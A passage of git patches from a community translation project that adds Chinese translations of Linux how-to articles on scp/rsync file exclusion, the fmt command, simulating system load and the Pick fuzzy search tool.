+[13]: https://linux.cn/
-[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
-[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
+[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
From 0efcad7f7cc0129da2cd37bfcd4d0251bc6541b3 Mon Sep 17 00:00:00 2001
From: wxy
Date: Wed, 10 Jan 2018 07:05:31 +0800
Subject: [PATCH 209/371] PUB:20171120 Save Files Directly To Google Drive And
Download 10 Times Faster.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@Drshu 文章首发地址: https://linux.cn/article-9225-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/Drshu
---
...Files Directly To Google Drive And Download 10 Times Faster.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md (100%)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/published/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
similarity index 100%
rename from translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
rename to published/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
From 1a72470dfa02f8b692cd823c9a9aa2299bfe7218 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Wed, 10 Jan 2018 08:51:20 +0800
Subject: [PATCH 210/371] translated
---
...file when using scp command recursively.md | 89 -------------------
...file when using scp command recursively.md | 86 ++++++++++++++++++
2 files changed, 86 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171228 How to exclude file when using scp command recursively.md
create mode 100644 translated/tech/20171228 How to exclude file when using scp command recursively.md
diff --git a/sources/tech/20171228 How to exclude file when using scp command recursively.md b/sources/tech/20171228 How to exclude file when using scp command recursively.md
deleted file mode 100644
index cee6bad5a1..0000000000
--- a/sources/tech/20171228 How to exclude file when using scp command recursively.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating---geekpi
-
-How to exclude file when using scp command recursively
-======
-
-I need to copy all the *.c files from local laptop named hostA to hostB including all directories. I am using the following scp command but do not know how to exclude specific files (such as *.out):
-```
-$ scp -r ~/projects/ user@hostB:/home/delta/projects/
-```
-
-How do I tell scp command to exclude particular file or directory at the Linux/Unix command line?
-
-One can use scp command to securely copy files between hosts on a network. It uses ssh for data transfer and authentication purpose. Typical syntax is:
-
-```
-scp file1 user@host:/path/to/dest/
-scp -r /path/to/source/ user@host:/path/to/dest/
-```
-
-## Scp exclude files
-
-I don't think so you can filter or exclude files when using scp command. However, there is a great workaround to exclude files and copy it securely using ssh. This page explains how to filter or excludes files when using scp to copy a directory recursively.
-
-## How to use rsync command to exclude files
-
-The syntax is:
-`rsync av -e ssh --exclude='*.out' /path/to/source/ [[email protected]][1]:/path/to/dest/`
-Where,
-
- 1. **-a** : Recurse into directories i.e. copy all files and subdirectories. Also, turn on archive mode and all other options (-rlptgoD)
- 2. **-v** : Verbose output
- 3. **-e ssh** : Use ssh for remote shell so everything gets encrypted
- 4. **\--exclude='*.out'** : exclude files matching PATTERN e.g. *.out or *.c and so on.
-
-
-### Example of rsync command
-
-In this example copy all file recursively from ~/virt/ directory but exclude all *.new files:
-`$ rsync -av -e ssh --exclude='*.new' ~/virt/ [[email protected]][1]:/tmp`
-Sample outputs:
-[![Scp exclude files but using rsync exclude command][2]][2]
-
-Rsync command will fail if rsync not found on the remote server. In that case try the following scp command that uses [bash shell pattern matching][3] in the current directory (it won't work with the -r option):
-`$ ls `
-Sample outputs:
-```
-centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
-```
-
-centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
-
-Copy everything in the current directory except .new file(s):
-```
-$ shopt -s extglob
-$ scp !(.new)* [[email protected]][1]:/tmp/
-```
-Sample outputs:
-```
-centos71.log 100 % 4262 1.3MB/s 00:00
-centos71.qcow2 100 % 836MB 32.7MB/s 00: 25
-meta-data 100 % 47 18.5KB/s 00:00
-user-data 100 % 1543 569.7KB/s 00:00
-```
-
-
-See the following man pages for more info:
-```
-$ [man rsync][4]
-$ man bash
-$ [man scp][5]
-```
-
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/faq/scp-exclude-files-when-using-command-recursively-on-unix-linux/
-
-作者:[Vivek Gite][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
-[2]:https://www.cyberciti.biz/media/new/faq/2017/12/scp-exclude-files-on-linux-unix-macos-bash-shell-command-line.jpg
-[3]:https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html#Pattern-Matching
-[4]:https://www.samba.org/ftp/rsync/rsync.html
-[5]:https://man.openbsd.org/scp
diff --git a/translated/tech/20171228 How to exclude file when using scp command recursively.md b/translated/tech/20171228 How to exclude file when using scp command recursively.md
new file mode 100644
index 0000000000..e8623baa02
--- /dev/null
+++ b/translated/tech/20171228 How to exclude file when using scp command recursively.md
@@ -0,0 +1,86 @@
+如何在递归地使用 scp 命令时排除文件
+======
+
+我需要将所有包含 *.c 文件的文件夹从名为 hostA 的本地笔记本复制到 hostB。我使用的是下面的 scp 命令,但不知道如何排除特定的文件(如 \*.out):
+```
+$ scp -r ~/projects/ user@hostB:/home/delta/projects/
+```
+如何告诉 scp 命令在 Linux/Unix 命令行中排除特定的文件或目录?
+
+人们可以使用 scp 命令在网络主机之间安全地复制文件。它使用 ssh 进行数据传输和身份验证。典型的语法是:
+
+```
+scp file1 user@host:/path/to/dest/
+scp -r /path/to/source/ user@host:/path/to/dest/
+```
+
+## Scp 排除文件
+
+我不认为你可以在使用 scp 命令时过滤或排除文件。但是,有一个很好的解决方法来排除文件并使用 ssh 安全地复制它。本页面说明如何在使用 scp 递归复制目录时过滤或排除文件。
+
+## 如何使用 rsync 命令排除文件
+
+语法是:
+`rsync av -e ssh --exclude='*.out' /path/to/source/ [[email protected]][1]:/path/to/dest/`
+这里:
+
+ 1. **-a** :递归到目录,即复制所有文件和子目录。另外,打开归档模式和所有其他选项(-rlptgoD)
+ 2. **-v** :详细输出
+ 3. **-e ssh** :使用 ssh 作为远程 shell,这样所有的东西都被加密
+ 4. **\--exclude='*.out'** :排除匹配模式的文件,例如 \*.out 或 \*.c 等。
+
+
+### rsync 命令的例子
+
+在这个例子中,从 ~/virt/ 目录递归地复制所有文件,但排除所有 \*.new 文件:
+`$ rsync -av -e ssh --exclude='*.new' ~/virt/ [[email protected]][1]:/tmp`
+示例输出:
+[![Scp exclude files but using rsync exclude command][2]][2]
+
+如果远程服务器上找不到 rsync,那么 rsync 命令将失败。在这种情况下,请尝试使用以下 scp 命令,该命令在当前目录中使用[ bash shell 模式匹配] [3](它不与 -r 选项一起使用):
+`$ ls `
+示例输出:
+```
+centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
+```
+
+centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
+
+复制除 .new 之外的当前目录中的所有内容:
+```
+$ shopt -s extglob
+$ scp !(.new)* [[email protected]][1]:/tmp/
+```
+示例输出:
+```
+centos71.log 100 % 4262 1.3MB/s 00:00
+centos71.qcow2 100 % 836MB 32.7MB/s 00: 25
+meta-data 100 % 47 18.5KB/s 00:00
+user-data 100 % 1543 569.7KB/s 00:00
+```
+
+
+有关更多信息,请参阅以下手册页:
+```
+$ [man rsync][4]
+$ man bash
+$ [man scp][5]
+```
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/scp-exclude-files-when-using-command-recursively-on-unix-linux/
+
+作者:[Vivek Gite][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
+[2]:https://www.cyberciti.biz/media/new/faq/2017/12/scp-exclude-files-on-linux-unix-macos-bash-shell-command-line.jpg
+[3]:https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html#Pattern-Matching
+[4]:https://www.samba.org/ftp/rsync/rsync.html
+[5]:https://man.openbsd.org/scp
From daa21ee658ab6632e6cd4acbb0f2af131d975d3d Mon Sep 17 00:00:00 2001
From: geekpi
Date: Wed, 10 Jan 2018 08:55:59 +0800
Subject: [PATCH 211/371] translating
---
...w To Display Asterisks When You Type Password In terminal.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
index d0d8328370..7a49972103 100644
--- a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
+++ b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
How To Display Asterisks When You Type Password In terminal
======
From 199c553b55b77dac63e92f55e7e9a1ef99193e2d Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 10:09:31 +0800
Subject: [PATCH 212/371] translate done: 20170918 Linux fmt command - usage
and examples.md
---
... Linux fmt command - usage and examples.md | 93 ---------------
... Linux fmt command - usage and examples.md | 106 ++++++++++++++++++
2 files changed, 106 insertions(+), 93 deletions(-)
delete mode 100644 sources/tech/20170918 Linux fmt command - usage and examples.md
create mode 100644 translated/tech/20170918 Linux fmt command - usage and examples.md
diff --git a/sources/tech/20170918 Linux fmt command - usage and examples.md b/sources/tech/20170918 Linux fmt command - usage and examples.md
deleted file mode 100644
index 19d0452d96..0000000000
--- a/sources/tech/20170918 Linux fmt command - usage and examples.md
+++ /dev/null
@@ -1,93 +0,0 @@
-translating by lujun9972
-Linux fmt command - usage and examples
-======
-
-Sometimes you may find yourself in a situation where-in the requirement is to format the contents of a text file. For example, the text file contains one word per line, and the task is to format all the words in a single line. Of course, this can be done manually, but not everyone likes doing time consuming stuff manually. Plus, that's just one use-case - the requirement could be anything.
-
-Gladly, there exists a command that can cater to at-least some of the text formatting requirements. The tool in question is dubbed **fmt**. In this tutorial, we will discuss the basics of fmt, as well as some of main features it provides. Please note that all commands and instructions mentioned here have been tested on Ubuntu 16.04LTS.
-
-### Linux fmt command
-
-The fmt command is a simple text formatting tool available to users of the Linux command line. Following is its basic syntax:
-
-fmt [-WIDTH] [OPTION]... [FILE]...
-
-And here's how the man page describes it:
-
-Reformat each paragraph in the FILE(s), writing to standard output. The option -WIDTH is an abbreviated form of --width=DIGITS.
-
-Following are some Q&A-styled examples that should give you a good idea about fmt's usage.
-
-### Q1. How to format contents of file in single line using fmt?
-
-That's what the fmt command does when used in its basic form (sans any options). You only need to pass the filename as an argument.
-
-fmt [file-name]
-
-The following screenshot shows the command in action:
-
-[![format contents of file in single line][1]][2]
-
-So you can see that multiple lines in the file were formatted in a way that everything got clubbed up in a single line. Please note that the original file (file1 in this case) remains unaffected.
-
-### Q2. How to change maximum line width?
-
-By default, the maximum width of a line that fmt command produces in output is 75. However, if you want, you can change that using the **-w** command line option, which requires a numerical value representing the new limit.
-
-fmt -w [n] [file-name]
-
-Here's an example where width was reduced to 20:
-
-[![change maximum line width][3]][4]
-
-### Q3. How to make fmt highlight the first line?
-
-This can be done by making the indentation of the first line different from the rest, something which you can do by using the **-t** command line option.
-
-fmt -t [file-name]
-
-[![make fmt highlight the first line][5]][6]
-
-### Q4. How to make fmt split long lines?
-
-The fmt command is capable of splitting long lines as well, a feature which you can access using the **-s** command line option.
-
-fmt -s [file-name]
-
-Here's an example of this option:
-
-[![make fmt split long lines][7]][8]
-
-### Q5. How to have separate spacing for words and lines?
-
-The fmt command offers a **-u** option, which ensures one space between words and two between sentences. Here's how you can use it:
-
-fmt -u [file-name]
-
-Note that this feature was enabled by default in our case.
-
-### Conclusion
-
-Agreed, fmt offers limited features, but you can't say it has limited audience. Reason being, you never know when you may need it. Here, in this tutorial, we've covered majority of the command line options that fmt offers. For more details, head to the tool's [man page][9].
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-fmt-command/
-
-作者:[Himanshu Arora][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
-[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
-[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
-[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
-[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
-[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
-[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
-[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
-[9]:https://linux.die.net/man/1/fmt
diff --git a/translated/tech/20170918 Linux fmt command - usage and examples.md b/translated/tech/20170918 Linux fmt command - usage and examples.md
new file mode 100644
index 0000000000..e9b1d8921a
--- /dev/null
+++ b/translated/tech/20170918 Linux fmt command - usage and examples.md
@@ -0,0 +1,106 @@
+Linux fmt 命令 - 用法与案例
+======
+
+有时你会发现需要格式化某个文本文件中的内容。比如,该文本文件每行一个单词,而人物是把所有的单词都放在同一行。当然,你可以手工来做,但没人喜欢手工做这么耗时的工作。而且,这只是一个例子 - 事实上的任务可能千奇百怪。
+
+好在,有一个命令可以满足至少一部分的文本格式化的需求。这个工具就是 `fmt`。本教程将会讨论 `fmt` 的基本用法以及它提供的一些主要功能。文中所有的命令和指令都在 Ubuntu 16.04LTS 下经过了测试。
+
+### Linux fmt 命令
+
+fmt 命令是一个简单的文本格式化工具,任何人都能在命令行下运行它。它的基本语法为:
+
+```
+fmt [-WIDTH] [OPTION]... [FILE]...
+```
+
+它的 man 页是这么说的:
+
+```
+重新格式化文件FILE(s)中的每一个段落,将结果写到标准输出. 选项 -WIDTH 是 --width=DIGITS 形式的缩写
+```
+
+下面这些问答方式的例子应该能让你对 fmt 的用法有很好的了解。
+
+### Q1。如何使用 fmt 来将文本内容格式成同一行?
+
+使用 `fmt` 命令的基本格式(省略任何选项)就能做到这一点。你只需要将文件名作为参数传递给它。
+
+```
+fmt [file-name]
+```
+
+下面截屏是命令的执行结果:
+
+[![format contents of file in single line][1]][2]
+
+你可以看到文件中多行内容都被格式化成同一行了。请注意,这并不会修改原文件(也就是 file1)。
+
+### Q2。如何修改最大行宽?
+
+默认情况下,`fmt` 命令产生的输出中的最大行宽为 75。然而,如果你想的话,可以用 `-w` 选项进行修改,它接受一个表示新行宽的数字作为参数值。
+
+```
+fmt -w [n] [file-name]
+```
+
+下面这个例子把行宽削减到了 20:
+
+[![change maximum line width][3]][4]
+
+### Q3。如何让 fmt 突出显示第一行?
+
+这是通过让第一行的缩进与众不同来实现的,你可以使用 `-t` 选项来实现。
+
+```
+fmt -t [file-name]
+```
+
+[![make fmt highlight the first line][5]][6]
+
+### Q4。如何使用 fmt 拆分长行?
+
+fmt 命令也能用来对长行进行拆分,你可以使用 `-s` 选项来应用该功能。
+
+```
+fmt -s [file-name]
+```
+
+下面是一个例子:
+
+[![make fmt split long lines][7]][8]
+
+### Q5。如何在单词与单词之间,行与行之间用空格分开?
+
+fmt 命令提供了一个 `-u` 选项,这会在单词与单词之间用单个空格分开,行与行之间用两个空格分开。你可以这样用:
+
+```
+fmt -u [file-name]
+```
+
+注意,在我们的案例中,这个功能是默认开启的。
+
+### 总结
+
+没错,fmt 提供的功能不多,但不代表它的应用就不广泛。因为你永远不知道什么时候会用到它。在本教程中,我们已经讲解了 `fmt` 提供的主要选项。若想了解更多细节,请查看该工具的 [man 页 ][9]。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-fmt-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
+[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
+[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
+[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
+[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
+[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
+[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
+[9]:https://linux.die.net/man/1/fmt
From 3f342d075f797da33c021975bfb8930941ffa029 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Wed, 10 Jan 2018 12:15:06 +0800
Subject: [PATCH 213/371] Translating by qhwdw
---
...20170927 Microservices and containers- 5 pitfalls to avoid.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
index e92ee3f89a..bb92793601 100644
--- a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
+++ b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
Microservices and containers: 5 pitfalls to avoid
======
From f169984d040986723d55f958851fa013662ade70 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 13:06:17 +0800
Subject: [PATCH 214/371] translate done: 20170924 Simulate System Loads.md
---
.../tech/20170924 Simulate System Loads.md | 81 -------------------
.../tech/20170924 Simulate System Loads.md | 80 ++++++++++++++++++
2 files changed, 80 insertions(+), 81 deletions(-)
delete mode 100644 sources/tech/20170924 Simulate System Loads.md
create mode 100644 translated/tech/20170924 Simulate System Loads.md
diff --git a/sources/tech/20170924 Simulate System Loads.md b/sources/tech/20170924 Simulate System Loads.md
deleted file mode 100644
index 2808f9b4d5..0000000000
--- a/sources/tech/20170924 Simulate System Loads.md
+++ /dev/null
@@ -1,81 +0,0 @@
-translating by lujun9972
-Simulate System Loads
-======
-Sysadmins often need to discover how the performance of an application is affected when the system is under certain types of load. This means that an artificial load must be re-created. It is, of course, possible to install dedicated tools to do this but this option isn't always desirable or possible.
-
-Every Linux distribution comes with all the tools needed to create load. They are not as configurable as dedicated tools but they will always be present and you already know how to use them.
-
-### CPU
-
-The following command will generate a CPU load by compressing a stream of random data and then sending it to `/dev/null`:
-```
-cat /dev/urandom | gzip -9 > /dev/null
-
-```
-
-If you require a greater load or have a multi-core system simply keep compressing and decompressing the data as many times as you need e.g.:
-```
-cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
-
-```
-
-Use `CTRL+C` to end the process.
-
-### RAM
-
-The following process will reduce the amount of free RAM. It does this by creating a file system in RAM and then writing files to it. You can use up as much RAM as you need to by simply writing more files.
-
-First, create a mount point then mount a `ramfs` filesystem there:
-```
-mkdir z
-mount -t ramfs ramfs z/
-
-```
-
-Then, use `dd` to create a file under that directory. Here a 128MB file is created:
-```
-dd if=/dev/zero of=z/file bs=1M count=128
-
-```
-
-The size of the file can be set by changing the following operands:
-
- * **bs=** Block Size. This can be set to any number followed **B** for bytes, **K** for kilobytes, **M** for megabytes or **G** for gigabytes.
- * **count=** The number of blocks to write.
-
-
-
-### Disk
-
-We will create disk I/O by firstly creating a file, and then use a for loop to repeatedly copy it.
-
-This command uses `dd` to generate a 1GB file of zeros:
-```
-dd if=/dev/zero of=loadfile bs=1M count=1024
-
-```
-
-The following command starts a for loop that runs 10 times. Each time it runs it will copy `loadfile` over `loadfile1`:
-```
-for i in {1..10}; do cp loadfile loadfile1; done
-
-```
-
-If you want it to run for a longer or shorter time change the second number in `{1..10}`.
-
-If you prefer the process to run forever until you kill it with `CTRL+C` use the following command:
-```
-while true; do cp loadfile loadfile1; done
-
-```
---------------------------------------------------------------------------------
-
-via: https://bash-prompt.net/guides/create-system-load/
-
-作者:[Elliot Cooper][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://bash-prompt.net
diff --git a/translated/tech/20170924 Simulate System Loads.md b/translated/tech/20170924 Simulate System Loads.md
new file mode 100644
index 0000000000..66b74be5c1
--- /dev/null
+++ b/translated/tech/20170924 Simulate System Loads.md
@@ -0,0 +1,80 @@
+模拟系统负载的方法
+======
+系统管理员通常需要探索在不同负载对应用性能的影响。这意味着必须要重复地人为创造负载。当然,你可以通过专门的工具来实现,但有时你可能不想也无法安装新工具。
+
+每个 Linux 发行版中都自带有创建负载的工具。他们不如专门的工具那么灵活但它们是现成的,而且无需专门学习。
+
+### CPU
+
+下面命令会创建 CPU 负荷,方法是通过压缩随机数据并将结果发送到 `/dev/null`:
+```
+cat /dev/urandom | gzip -9 > /dev/null
+
+```
+
+如果你想要更大的负荷,或者系统有多个核,那么只需要对数据进行压缩和解压就行了,像这样:
+```
+cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
+
+```
+
+按下 `CTRL+C` 来暂停进程。
+
+### RAM
+
+下面命令会减少可用内存的总量。它是是通过在内存中创建文件系统然后往里面写文件来实现的。你可以使用任意多的内存,只需哟往里面写入更多的文件就行了。
+
+首先,创建一个挂载点,然后将 `ramfs` 文件系统挂载上去:
+```
+mkdir z
+mount -t ramfs ramfs z/
+
+```
+
+第二步,使用 `dd` 在该目录下创建文件。这里我们创建了一个 128M 的文件:
+```
+dd if=/dev/zero of=z/file bs=1M count=128
+
+```
+
+文件的大小可以通过下面这些操作符来修改:
+
+ + **bs=** 块大小。可以是任何数字后面接上 **B**( 表示字节 ),**K**( 表示 KB),**M**( 表示 MB) 或者 **G**( 表示 GB)。
+ + **count=** 要写多少个块
+
+
+
+### Disk
+
+创建磁盘 I/O 的方法是先创建一个文件,然后使用 for 循环来不停地拷贝它。
+
+下面使用命令 `dd` 创建了一个充满零的 1G 大小的文件:
+```
+dd if=/dev/zero of=loadfile bs=1M count=1024
+
+```
+
+下面命令用 for 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+```
+for i in {1..10}; do cp loadfile loadfile1; done
+
+```
+
+通过修改 `{1。.10}` 中的第二个参数来调整运行时间的长短。
+
+若你想要一直运行,直到按下 `CTRL+C` 来停止,则运行下面命令:
+```
+while true; do cp loadfile loadfile1; done
+
+```
+--------------------------------------------------------------------------------
+
+via: https://bash-prompt.net/guides/create-system-load/
+
+作者:[Elliot Cooper][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://bash-prompt.net
From 6c9938014f812121bf7e079708a1ed9c6111fadf Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 14:52:57 +0800
Subject: [PATCH 215/371] translate done: 20170925 A Commandline Fuzzy Search
Tool For Linux.md
---
...Commandline Fuzzy Search Tool For Linux.md | 138 ------------------
...Commandline Fuzzy Search Tool For Linux.md | 138 ++++++++++++++++++
2 files changed, 138 insertions(+), 138 deletions(-)
delete mode 100644 sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
create mode 100644 translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
diff --git a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
deleted file mode 100644
index ae599ad22b..0000000000
--- a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
+++ /dev/null
@@ -1,138 +0,0 @@
-translating by lujun9972
-A Commandline Fuzzy Search Tool For Linux
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-Today, we will be discussing about an Interesting commandline utility called **" Pick"**. It allows users to select from a set of choices using an ncurses(3X) interface with fuzzy search functionality. The Pick utility can be helpful in certain situations where you wanted to search for a folder or file that contains a non-English characters in their name. You don't have to learn how to type the non-english characters. Using Pick, you can easily search them, select them and view or cd into them easily. You don't even have to type any characters to search a file or folder. It's good for those working with large pile of directories and files.
-
-### Pick - A Commandline Fuzzy Search Tool For Linux
-
-#### Installing Pick
-
-For **Arch Linux** and its derivatives, Pick is available in [**AUR**][1]. So, the Arch users can install it using AUR helper tools such as [**Pacaur**][2], [**Packer**][3], and [**Yaourt**][4] etc.
-```
-pacaur -S pick
-```
-
-Or,
-```
-packer -S pick
-```
-
-Or,
-```
-yaourt -S pick
-```
-
-The **Debian** , **Ubuntu** , **Linux Mint** users run the following command to install Pick.
-```
-sudo apt-get install pick
-```
-
-For other distributions, download the latest release from [**here**][5] and follow the below instructions to install Pick. As of writing this guide, the latest version was 1.9.0.
-```
-wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
-tar -zxvf pick-1.9.0.tar.gz
-cd pick-1.9.0/
-```
-
-Configure it using command:
-```
-./configure
-```
-
-Finally, build and install pick:
-```
-make
-sudo make install
-```
-
-#### Usage
-
-By combining it with other commands will make your commandline life much easier. I will show some examples, so you can understand how it works.
-
-Let me create a stack of directories.
-```
-mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
-```
-
-Now, you want to go the directory /ijkl/ directory. You have two choice. You can either use **cd** command like below:
-```
-cd abcd/efgh/ijkl/
-```
-
-Or, create a [**shortcut**][6] or an alias to that directory, so you can switch to the directory in no time.
-
-Alternatively, just use "pick" command to switch a particular directory more easily. Have a look at the below example.
-```
-cd $(find . -type d | pick)
-```
-
-This command will list all directories and its sub-directories in the current working directory, so you can just select any directory you'd like to cd into using Up/Down arrows, and hit ENTER key.
-
-**Sample output:**
-
-[![][7]][8]
-
-Also, it will suggest the directories or files that contains a specific letters as you type them. For example, the following output shows the list of suggestions when I type "or".
-
-[![][7]][9]
-
-It's just an example. You can use "pick" command along with other commands as well.
-
-Here is an another example.
-```
-find -type f | pick | xargs less
-```
-
-This command will allow you to select any file in the current directory to view in less.
-
-[![][7]][10]
-
-Care to learn another example? Here you go. The following command will allow you to select individual files or folders in the current directory you want to move to any destination of your choice, for example **/home/sk/ostechnix**.
-```
-mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
-```
-
-[![][7]][11]
-
-Choose the file(s) by using Up/Down arrows and hit ENTER to move them to /home/sk/ostechnix/ directory.
-
-[![][7]][12]
-
-As you see in the above output, I have moved the folder called "abcd" to "ostechnix" directory.
-
-The use cases are unlimited. There is also a plugin called [**pick.vim**][13] for Vim editor to make your searches much easier inside Vim editor.
-
-For more details, refer man pages.
-```
-man pick
-```
-
-That's all for now folks. Hope this utility helps. If you find our guides useful, please share them on your social, professional networks and recommended OSTechNix blog to all your contacts.
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://aur.archlinux.org/packages/pick/
-[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
-[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
-[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
-[5]:https://github.com/calleerlandsson/pick/releases/
-[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
-[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
